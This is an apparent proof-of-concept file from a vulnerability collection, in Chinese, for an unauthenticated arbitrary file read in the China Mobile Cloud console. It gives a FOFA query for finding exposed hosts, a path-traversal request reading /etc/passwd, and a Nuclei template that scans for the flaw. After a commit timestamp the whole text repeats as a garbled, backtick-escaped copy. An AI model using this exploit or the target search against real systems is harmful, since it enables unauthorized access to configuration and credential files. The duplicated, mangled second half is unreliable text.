POC00/中国移动云控制台存在任意文件读取.md

## 中国移动云控制台存在任意文件读取

中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统，移动云控制台存在文件任意读取漏洞，未授权攻击者可以利用其读取网站配置文件等敏感信息

## fofa

```
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
```

## poc

```
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: ip
```

![image-20240602201314531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022013615.png)


## Yaml

```
id: cmecloud-console-readfile

info:
  name: 移动云控制台存在任意文件读取
  author: onewin
  severity: high
  description: 移动云控制台存在任意文件读取

http:
- raw:
  - |+
    @timeout: 30s
    GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
    Host: {{Hostname}}

  matchers-condition: and
  matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root"
        part: body
```
6.2更新漏洞 2024-06-02 20:24:10 +08:00			`## 中国移动云控制台存在任意文件读取`

			`中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统，移动云控制台存在文件任意读取漏洞，未授权攻击者可以利用其读取网站配置文件等敏感信息`

			`## fofa`

			```
			`body="op-login-static/favicon.ico" \|\| header="/oauth2/code/opgateway"`
			```

			`## poc`

			```
			`GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1`
			`Host: ip`
			```

			`![image-20240602201314531](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406022013615.png)`



			`## Yaml`

			```
			`id: cmecloud-console-readfile`

			`info:`
			`name: 移动云控制台存在任意文件读取`
			`author: onewin`
			`severity: high`
			`description: 移动云控制台存在任意文件读取`

			`http:`
			`- raw:`
			`- \|+`
			`@timeout: 30s`
			`GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "root"`
			`part: body`
			```